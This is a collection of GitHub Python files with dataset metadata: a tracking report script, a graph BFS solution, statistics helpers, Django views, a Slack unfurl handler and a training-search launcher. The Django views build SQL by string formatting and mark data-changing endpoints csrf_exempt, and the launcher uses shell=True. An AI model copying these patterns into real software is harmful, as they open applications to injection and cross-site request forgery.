df_data.loc[:, 'timestamp'] = pd.to_datetime(df_data['timestamp'])\n df_data['timestamp'] = df_data['timestamp'].apply(convert_timezone)\n return df_data\n\n except dateutil.parser.ParserError:\n print('Ops! Invalid date/hour!')\n sys.exit(os.EX_DATAERR)\n\n except KeyError:\n print('Ops! ', sys.exc_info()[1], 'column was not found.')\n sys.exit(os.EX_DATAERR)\n\n except Exception:\n print(\"Unexpected error:\", sys.exc_info()[0])\n sys.exit(os.EX_SOFTWARE)\n\n\ndef calc_statistics(df_logs: pd.DataFrame, date_from: datetime, date_to: datetime) -> pd.DataFrame:\n \"\"\" Calculate the page views and unique visitors.\n\n Args:\n df_logs: pd.DataFrame\n Filtered and Cleaned dataframe to generate output report\n date_from: datetime\n Date Range - Initial date\n date_to: datetime\n Date Range - Final date\n\n Returns:\n A dataframe with the number of page views and visitors for each url.\n Columns: url, pageviews, visitors\n \"\"\"\n try:\n df_logs = df_logs.loc[(df_logs['timestamp'] >= date_from) & (df_logs['timestamp'] <= date_to)]\n\n # unique visitors by url\n df = df_logs.groupby(\"url\").agg({\"userid\": pd.Series.nunique})\n df.rename(columns={'userid': 'visitors'}, inplace=True)\n\n # pageviews\n data = df_logs.groupby([\"url\"])\n data = data.size().reset_index(name=\"pageviews\")\n df_merge = pd.merge(data, df, how=\"inner\", on=[\"url\"])\n\n return df_merge\n\n except Exception:\n print(\"Unexpected error:\", sys.exc_info()[0])\n sys.exit(os.EX_SOFTWARE)\n\n\nif __name__ == '__main__':\n\n # Parse CLI Arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"date_from\",\n help=\"Start date for time range filter. Example: '2013-09-01 09:00:00'.\",\n type=lambda d: dateutil.parser.parse(d))\n parser.add_argument(\"date_to\",\n help=\"End date for time range filter. Example: '2013-09-01 10:59:59'.\",\n type=lambda d: dateutil.parser.parse(d))\n parser.add_argument(\"log\",\n help=\"Path to a log of website visitors.\",\n type=open_log)\n parser.add_argument(\"-o\", \"--output\",\n help=\"Path to save the output as a CSV file.\",\n required=False,\n type=str)\n args = parser.parse_args()\n\n\n # Standardize datetimes to UTC\n date_from = convert_timezone(args.date_from)\n date_to = convert_timezone(args.date_to)\n\n\n # Processing\n df_logs = clean_data(args.log)\n df_result = calc_statistics(df_logs, date_from, date_to)\n\n\n # Output\n print(tabulate(df_result, headers='keys', tablefmt='pretty', showindex=False))\n # If output parameter is set, save the file\n if args.output:\n df_result.to_csv(args.output, index=False)", "repo_name": "camylawojcik/tracking_report", "sub_path": "report/tracking_pixels.py", "file_name": "tracking_pixels.py", "file_ext": "py", "file_size_in_byte": 4169, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 14, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 17, "usage_type": "call"}, {"api_name": "argparse.ArgumentTypeError", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pytz.utc", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 42, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 48, "usage_type": "call"}, {"api_name": "os.EX_DATAERR", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 51, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 52, "usage_type": "call"}, {"api_name": "os.EX_DATAERR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.exc_info", "line_number": 55, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 56, "usage_type": "call"}, {"api_name": "os.EX_SOFTWARE", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 84, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 90, "usage_type": "call"}, {"api_name": "os.EX_SOFTWARE", "line_number": 90, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 96, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 99, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dateutil.parser.parse", "line_number": 102, "usage_type": "call"}, {"api_name": "dateutil.parser", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tabulate.tabulate", "line_number": 124, "usage_type": "call"}]} +{"seq_id": "24737028807", "text": "import sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn = int(input())\ngraph = [[] for _ in range(n+1)]\nfor i in range(n-1):\n v1, v2 = map(int, input().split())\n graph[v1].append(v2)\n graph[v2].append(v1)\n\nparent = [0] * (n+1)\nvisited = [False] * (n+1)\n\nqueue = deque([1])\nvisited[1] = True\nwhile queue:\n v = queue.popleft()\n for i in graph[v]:\n if not visited[i]:\n queue.append(i)\n parent[i] = v\n visited[i] = True\n\nfor i in parent[2:]:\n print(i)\n", "repo_name": "miseongk/Algorithm", "sub_path": "BAEKJOON/Classification/Graph_Traversal/11725.py", "file_name": "11725.py", "file_ext": "py", "file_size_in_byte": 521, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.stdin", "line_number": 3, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "71252770088", "text": "# -*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy import stats\n\n\n\n\ndef savitzky_golay(y, window_size=100, order=3, deriv=0, rate=1):\n import numpy as np\n from math import factorial\n\n order_range = range(order+1)\n half_window = (window_size -1) // 2\n b = np.mat([[k**i for i in order_range] for k in range(-half_window, half_window+1)])\n m = np.linalg.pinv(b).A[deriv] * rate**deriv * factorial(deriv)\n firstvals = y[0] - np.abs( y[1:half_window+1][::-1] - y[0] )\n lastvals = y[-1] + np.abs(y[-half_window-1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve( m[::-1], y, mode='valid')\n\n\ndef smooth(x):\n smooth_x = np.round(savitzky_golay(x, window_size=100))\n return smooth_x\n\n\ndef get_center(x):\n mean = np.mean(x)\n media = np.median(x)\n mode = np.argmax(np.bincount(x.astype(int)))\n# from collections import Counter\n# c = Counter(x)\n# mode = sorted(c.keys(), key=lambda x:c[x])[-1]\n return mean, media, mode\n\n\ndef get_center2(x, n_bins=20):\n mean = np.mean(x)\n media = np.median(x)\n mode = np.argmax(savitzky_golay(np.bincount(x), window_size=(max(x) - min(x)) // n_bins))\n return mean, media, mode\n\n\ndef get_scatter(x):\n var = np.var(x)\n std = np.std(x)\n #std = var ** 0.5\n cv = 100. * std / np.mean(x)\n return var, std, cv\n\n\ndef quantile(x):\n return [np.percentile(x, i) for i in [0, 25, 50, 75, 100]]\n\ndef count_bitmap(x):\n c = np.bincount(x)\n return c[min(x):]\n\n\ndef pdf(x, norm_flag=False, zoom=1.):\n x = np.array(x)\n bias = x.min()\n x = (x - bias) * zoom \n x = x.astype(int)\n #c = np.bincount(x)\n c = count_bitmap(x)\n if norm_flag:\n# c = c * (x.max() - x.min()) * 1. / len(x) \n c = c * zoom * 1. / len(x) \n #return np.arange(x.min()+bias, x.max()+1+bias) * 1. / zoom, c \n return np.arange(x.min(), x.max()+1) * 1. / zoom + bias, c \n\ndef cdf(x, norm_flag=False):\n i, p = pdf(x, norm_flag=False)\n cp = np.add.accumulate(p)\n if norm_flag:\n cp = cp * 1. / len(x)\n return i, cp\n \n\ndef pdf2(x, norm_flag=False, n_bins=20, zoom=1):\n i, p = pdf(x, norm_flag, zoom=zoom)\n xp = savitzky_golay(p, window_size=len(p)//n_bins)\n xp[xp < 0] = 0\n return i, xp\n \ndef skewness(x):\n return stats.moment(x, moment=3) / (np.std(x) ** 3)\n \ndef kurtosis(x):\n return stats.moment(x, moment=4) / (np.var(x) ** 2) - 3", "repo_name": "KG-book/EntityMining", "sub_path": "chapter2/src/data_distribute_feature.py", "file_name": "data_distribute_feature.py", "file_ext": "py", "file_size_in_byte": 2424, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 43, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.mat", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.linalg.pinv", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 15, "usage_type": "attribute"}, {"api_name": "math.factorial", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.var", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.bincount", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.add.accumulate", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 75, "usage_type": "attribute"}, {"api_name": "scipy.stats.moment", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 88, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 88, "usage_type": "call"}, {"api_name": "scipy.stats.moment", "line_number": 91, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 91, "usage_type": "name"}, {"api_name": "numpy.var", "line_number": 91, "usage_type": "call"}]} +{"seq_id": "4657340891", "text": "from rest_framework.views import APIView\nfrom core.serializer import MicrogridSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.generics import CreateAPIView\nfrom core.serializer import MicrogridSerializer, MicrogridParametersSerializer, ComponentSerializer, MicrogridSerializer, DataPointsSerializer\nimport json\nfrom core.models import Microgrid\nfrom itertools import chain, starmap\n\ndef flatten_parameters(microgrid_parameters):\n\n flattened_dict = {}\n flattened_dict['microgrid'] = microgrid_parameters['microgrid']\n flattened_dict['connection_type'] = microgrid_parameters['point_of_common_coupling']['connection_type']\n flattened_dict['connection_type'] = microgrid_parameters['point_of_common_coupling']['connection_type']\n flattened_dict['diesel_price'] = microgrid_parameters['point_of_common_coupling']['diesel_price']\n flattened_dict['natural_gas_price'] = microgrid_parameters['point_of_common_coupling']['natural_gas_price']\n flattened_dict['utility_name'] = microgrid_parameters['point_of_common_coupling']['utility']['utility_name']\n flattened_dict['group'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['group']\n flattened_dict['subgroup'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['subgroup']\n flattened_dict['tariff_type'] = microgrid_parameters['point_of_common_coupling']['utility']['consumer_type']['tariff_type']\n flattened_dict['pis_cofins'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['pis_cofins']\n flattened_dict['icms_1_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['limit']\n flattened_dict['icms_1_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['value']\n flattened_dict['icms_2_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_2']['limit']\n flattened_dict['icms_2_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_2']['value']\n flattened_dict['icms_3_limit'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['limit']\n flattened_dict['icms_3_value'] = microgrid_parameters['point_of_common_coupling']['utility']['taxes']['icms_1']['value']\n flattened_dict['tusd_d_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_d_peak']\n flattened_dict['tusd_d_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_d_base']\n flattened_dict['tusd_e_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_peak']\n flattened_dict['tusd_e_intermediary'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_intermediary']\n flattened_dict['tusd_e_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['distribution']['tusd_e_base']\n flattened_dict['energy_price_peak'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_peak']\n flattened_dict['energy_price_intermediary'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_intermediary']\n flattened_dict['energy_price_base'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['energy_price_base']\n flattened_dict['tariff_flag_signal'] = microgrid_parameters['point_of_common_coupling']['utility']['rates']['energy']['tariff_flag_signal']\n\n return flattened_dict\n\ndef flatten_component(lista):\n\n new_dict = {}\n new_dict['component_id'] = lista['component_id']\n new_dict['component_type'] = lista['component_type']\n new_dict['operation_status'] = lista['operation_status']\n new_dict['meters_id'] = lista['meters'][list(lista['meters'].keys())[0]]['meters_id']\n new_dict['data_points'] = lista['meters'][list(lista['meters'].keys())[0]]['data_points']\n\n return new_dict\n \ndef append_flattened_components(request, request_id):\n new_request_flattened = []\n for n in request:\n each_component_flattened = flatten_component(n)\n each_component_flattened['microgrid'] = request_id\n new_request_flattened.append(each_component_flattened)\n return new_request_flattened \n\n\n\nclass MrConfig(APIView):\n\n def post(self, request):\n \"\"\"Manipulate request data and validate with serializers\"\"\"\n \n \"\"\"Slice microgrid_info\"\"\" \n microgrid_info = request.data['microgrid_info']\n\n \"\"\"Validate microgrid_info and save in database\"\"\"\n serializer = MicrogridSerializer(data=microgrid_info)\n if serializer.is_valid():\n serializer.save()\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n \"\"\"Slice microgrid_paramters\"\"\"\n microgrid_parameters = request.data[\"microgrid_parameters\"]\n\n \"\"\"Assign microgrid_id to microgrid_parameters\"\"\"\n microgrid_parameters['microgrid'] = serializer.data.get('id')\n\n \"\"\"Slice microgrid_components\"\"\"\n microgrid_components = request.data['components']\n\n \"\"\"Assign microgrid_id to microgrid_components\"\"\"\n microgrid_components = append_flattened_components(request.data[\"components\"], serializer.data.get('id'))\n\n \"\"\"Flatten microgrid_parameters\"\"\"\n new_dict = flatten_parameters(microgrid_parameters)\n\n \"\"\"Validate microgrid_parameters and save in database\"\"\"\n serializer = MicrogridParametersSerializer(data=new_dict)\n if serializer.is_valid():\n serializer.save()\n \n \"\"\"Validate microgrid_parameters and save in database\"\"\"\n serializer = ComponentSerializer(data=microgrid_components, many=True)\n if serializer.is_valid():\n serializer.save()\n \n \"\"\"Assign component_id to each data_point\"\"\"\n microgrid_data_points = []\n for n in range(0, len(serializer.data)):\n data_point_per_component = microgrid_components[n]['data_points']\n for i in data_point_per_component:\n i['component'] = serializer.data[n]['id']\n microgrid_data_points.append(i)\n \n \"\"\"Validate microgrid_data_points and save in database\"\"\"\n serializer = DataPointsSerializer(data=microgrid_data_points, many=True)\n if serializer.is_valid():\n serializer.save()\n message = 'Microrrede Adicionada Com Sucesso'\n return Response({'message' : message})\n else:\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n \n ", "repo_name": "jvrcerti/plataforma2", "sub_path": "core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6781, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.views.APIView", "line_number": 63, "usage_type": "name"}, {"api_name": "core.serializer.MicrogridSerializer", "line_number": 72, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 76, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 76, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 76, "usage_type": "name"}, {"api_name": "core.serializer.MicrogridParametersSerializer", "line_number": 94, "usage_type": "call"}, {"api_name": "core.serializer.ComponentSerializer", "line_number": 99, "usage_type": "call"}, {"api_name": "core.serializer.DataPointsSerializer", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 116, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 118, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 118, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 118, "usage_type": "name"}]} +{"seq_id": "23879220044", "text": "import matplotlib.pyplot as plt\ndef read_data(file_path):\n data = []\n with open(file_path, 'r') as file:\n lines = file.readlines()\n for line in lines:\n data.append(float(line.strip()))\n return data\n\ndef plot_data(data):\n x = list(range(1, len(data)+1))\n plt.plot(x, data)\n plt.xlabel('Rounds')\n plt.ylabel('Accuracy')\n plt.title('Accuracy Plot for Client1')\n plt.show()\n\nfile_path = 'C:\\\\Users\\\\intel\\\\Desktop\\\\Arjun Workspace\\\\B.Tech-Project---Federated-Learning\\\\Project_file\\\\models\\\\accuracy1.txt'\ndata = read_data(file_path)\nplot_data(data)", "repo_name": "Arjun-93/B.Tech-Project---Federated-Learning", "sub_path": "Project_file/models/plotting.py", "file_name": "plotting.py", "file_ext": "py", "file_size_in_byte": 597, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.plot", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}]} +{"seq_id": "32555150620", "text": "import os\nimport json\nimport requests\n\nBOT_TOKEN = os.environ['SLACK_BOT_TOKEN']\n\ndef handle_event(request):\n request_json = request.get_json()\n if not request_json:\n return 'ok'\n elif 'challenge' in request_json:\n return {'challenge': request_json['challenge']}\n elif 'event' in request_json:\n print('5')\n if request_json['event']['source'] == 'conversations_history' and request_json['event']['links']:\n user = request_json['event']['user']\n links = [x['url'] for x in request_json['event']['links']]\n channel = request_json['event']['channel']\n ts = request_json['event']['message_ts']\n print('link:', links)\n print('channel:', channel)\n print('user:', user)\n unfurl_link(channel, ts, links)\n else:\n return 'ok'\n\ndef unfurl_link(channel, ts, links):\n blocks = {\n 'blocks': [\n {\n 'type': 'section',\n 'text': {\n 'type': 'mrkdwn',\n 'text': \"*It looks like you've got a document to sign!*\"\n },\n 'accessory': {\n 'type': 'button',\n 'action_id': 'orbit',\n 'text': {\n 'type': 'plain_text',\n 'text': 'Open document'\n },\n 'style': 'primary',\n 'url': 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'\n }\n }\n ]\n }\n unfurl_json = {\n 'channel': channel,\n 'ts': ts,\n 'unfurls': {link: blocks for link in links}\n }\n url = 'https://slack.com/api/chat.unfurl'\n payload = json.dumps(unfurl_json)\n headers = {\n 'Authorization': f'Bearer {BOT_TOKEN}',\n 'Content-Type': 'application/json'\n }\n requests.request('POST', url, headers=headers, data=payload)\n", "repo_name": "idandrd/slack-links-pe-demo", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1940, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 5, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 55, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 60, "usage_type": "call"}]} +{"seq_id": "19689563878", "text": "from django.shortcuts import render, redirect\n\nfrom django.views.generic import FormView,TemplateView\nfrom django.urls import reverse_lazy\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.http import HttpResponseForbidden\nfrom django.contrib.auth.decorators import login_required\n#from django.http import HttpResponse\n#import json\nfrom .models import Userapps, Applications\nfrom django.db import connection\n\nfrom .forms import AppUserForm\n\n#class HomeView(TemplateView):\n# template_name = 'home/index.html'\n\n\nclass AjaxTemplateMixin(object): \n def dispatch(self, request, *args, **kwargs):\n if not hasattr(self, 'ajax_template_name'):\n split = self.template_name.split('.html')\n split[-1] = '_inner'\n split.append('.html')\n self.ajax_template_name = ''.join(split)\n if request.is_ajax():\n self.template_name = self.ajax_template_name\n return super(AjaxTemplateMixin, self).dispatch(request, *args, **kwargs)\n\n\nclass AppUserFormView(SuccessMessageMixin, AjaxTemplateMixin,FormView):\n template_name = 'home/add_app_form.html'\n form_class = AppUserForm\n success_url = reverse_lazy('home:index')\n #success_message = \"Way to go!\"\n\n # initialize the form choicefields \n def get_form_kwargs(self):\n kwargs = super(AppUserFormView, self).get_form_kwargs()\n kwargs['user'] = self.request.user.id\n return kwargs\n\n def form_valid(self, form):\n # This method is called when valid form data has been POSTed.\n # It should return an HttpResponse.\n #print(form.cleaned_data['app'])\n form.save(self.request.user.id)\n return super().form_valid(form)\n\n def get(self, request, *args, **kwargs):\n if not request.user.is_authenticated:\n return HttpResponseForbidden()\n #form_class = self.get_form_class()\n #form = self.get_form(form_class)\n #context = self.get_context_data(**kwargs)\n #context['form'] = form\n #print(\"GET: {}/{}\".format(request.user.id,request.user.username))\n return super().get(request, *args, **kwargs)\n\n '''\n def get_success_url(self):\n return reverse('home:index')\n\n def post(self, request, *args, **kwargs):\n print(\"POST: {}/{}\".format(request.user.id,request.user.username))\n form = self.get_form()\n return super().post(request, *args, **kwargs)\n \n '''\n\ndef get_userapps(userid):\n if userid is None:\n return None\n with connection.cursor() as cursor:\n rows = cursor.execute('''SELECT applications.id,\n name, description, color, defaultstatus, link, place_order FROM applications \n INNER JOIN userapps ON (userapps.app_id_id=applications.id \n and userapps.user_id_id = {})\n ORDER BY place_order\n '''.format(userid)).fetchall()\n if rows == []:\n data = cursor.execute(\"SELECT id FROM applications WHERE defaultstatus=1\").fetchall()\n data = [(i+1,)+d+(userid,) for i,d in enumerate(data)]\n #print(data)\n cursor.executemany('''INSERT INTO userapps(place_order,app_id_id,user_id_id) \n VALUES (?,?,?)''',data)\n rows = cursor.execute('''SELECT applications.id,\n name, description, color, defaultstatus, link, place_order FROM applications \n INNER JOIN userapps ON (userapps.app_id_id=applications.id \n and userapps.user_id_id = {})\n ORDER BY place_order\n '''.format(userid)).fetchall()\n\n\n return rows\n\n# Create your views here.\ndef index(request):\n userid = request.user.id\n userapps = get_userapps(userid)\n context = {\n 'title': 'Home Page',\n 'userapps_list': userapps,\n }\n return render(request, 'home/index.html', context=context)\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n@login_required\n@csrf_exempt\ndef delete(request, app_id):\n userid = request.user.id\n Userapps.objects.filter(app_id=app_id,user_id=userid).delete()\n return redirect('home:index')\n\n@csrf_exempt\ndef sort(request):\n userid = request.user.id\n #print(\"INDEX userid: \",userid)\n orders = request.GET.get('order', None)\n orders = orders.split(',')\n orders.pop() # delete a empty str\n orders = [int(i) for i in orders]\n #print(\"INDEX order: \", orders)\n for i,order in enumerate(orders):\n #print(order, i+1)\n Userapps.objects.filter(user_id=userid,app_id=order).update(place_order=i+1)\n return redirect('home:index') \n\n\n", "repo_name": "mdalai/webapp-skeleton", "sub_path": "home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.messages.views.SuccessMessageMixin", "line_number": 31, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 31, "usage_type": "name"}, {"api_name": "forms.AppUserForm", "line_number": 33, "usage_type": "name"}, {"api_name": "django.urls.reverse_lazy", "line_number": 34, "usage_type": "call"}, {"api_name": "django.http.HttpResponseForbidden", "line_number": 52, "usage_type": "call"}, {"api_name": "django.db.connection.cursor", "line_number": 74, "usage_type": "call"}, {"api_name": "django.db.connection", "line_number": 74, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 105, "usage_type": "call"}, {"api_name": "models.Userapps.objects.filter", "line_number": 113, "usage_type": "call"}, {"api_name": "models.Userapps.objects", "line_number": 113, "usage_type": "attribute"}, {"api_name": "models.Userapps", "line_number": 113, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 114, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 109, "usage_type": "name"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 110, "usage_type": "name"}, {"api_name": "models.Userapps.objects.filter", "line_number": 127, "usage_type": "call"}, {"api_name": "models.Userapps.objects", "line_number": 127, "usage_type": "attribute"}, {"api_name": "models.Userapps", "line_number": 127, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 128, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "9353946390", "text": "import autograd.numpy as anp\n\n\ndef calc_distance_to_weights(F, weights, utopian_point):\n norm = anp.linalg.norm(weights, axis=1)\n F = F - utopian_point\n\n d1 = (F * weights).sum(axis=1) / norm\n d2 = anp.linalg.norm(F - (d1[:, None] * weights / norm[:, None]), axis=1)\n\n return d1, d2\n", "repo_name": "AIasd/ADFuzz", "sub_path": "pymoo/pymoo/decomposition/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 298, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 21, "dataset": "github-code", "pt": "53", "api": [{"api_name": "autograd.numpy.linalg.norm", "line_number": 5, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 5, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 5, "usage_type": "name"}, {"api_name": "autograd.numpy.linalg.norm", "line_number": 9, "usage_type": "call"}, {"api_name": "autograd.numpy.linalg", "line_number": 9, "usage_type": "attribute"}, {"api_name": "autograd.numpy", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "22698519872", "text": "\"\"\"Peform hyperparemeters search\"\"\"\n\nimport argparse\nimport os\nfrom subprocess import check_call\nimport sys\nimport torch\nimport numpy as np\n\nimport utils\n\n\nPYTHON = sys.executable\nparser = argparse.ArgumentParser()\nparser.add_argument('--base_dir_cpu', default=\"C:/Users/H/Documents/Haifa Univ/Thesis/DL-Pytorch-data\",\n help='path to experiments and data folder in CPU only. not for Server')\nparser.add_argument('--parent_dir', default='experiments/base_model_weighted_schi_dist/syn-color/three_layers',\n help='Directory containing params.json')\nparser.add_argument('--data_dir', default='data/color-syn-one-color-big', help=\"Directory containing the dataset\")\n# parser.add_argument('--early_stop', type=bool, default=True, help=\"Optional, do early stop\")\n\n\n# 'experiments/learning_rate',\n\ndef launch_training_job(parent_dir, data_dir, early_stop, job_name, params):\n \"\"\"Launch training of the model with a set of hyperparameters in parent_dir/job_name\n\n Args:\n model_dir: (string) directory containing config, weights and log\n data_dir: (string) directory containing the dataset\n params: (dict) containing hyperparameters\n \"\"\"\n # Create a new folder in parent_dir with unique_name \"job_name\"\n model_dir = os.path.join(parent_dir, job_name)\n if not os.path.exists(model_dir):\n os.makedirs(model_dir)\n\n # Write parameters in json file\n json_path = os.path.join(model_dir, 'params.json')\n params.save(json_path)\n\n # print(os.getcwd())\n os.chdir(curr_dir)\n # Launch training with this config\n # adding compatibility to do early stop when searching for hyperparams\n cmd = \"{python} train.py --model_dir={model_dir} --data_dir {data_dir} --early_stop {early_stop}\".format(python=PYTHON, model_dir=model_dir,\n data_dir=data_dir, early_stop=early_stop)\n print(cmd)\n check_call(cmd, shell=True)\n\n\nif __name__ == \"__main__\":\n # Load the \"reference\" parameters from parent_dir json file\n curr_dir = os.getcwd()\n args = parser.parse_args()\n if args.base_dir_cpu and not torch.cuda.is_available():\n # args.parent_dir = os.path.join(args.base_dir_cpu, args.parent_dir)\n # args.data_dir = os.path.join(args.base_dir_cpu, args.data_dir)\n os.chdir(args.base_dir_cpu)\n\n json_path = os.path.join(args.parent_dir, 'params.json')\n assert os.path.isfile(json_path), \"No json configuration file found at {}\".format(json_path)\n params = utils.Params(json_path)\n\n # Perform hypersearch over one parameter\n\n learning_rate = None\n dropout_rate = None\n hidden_sizes = 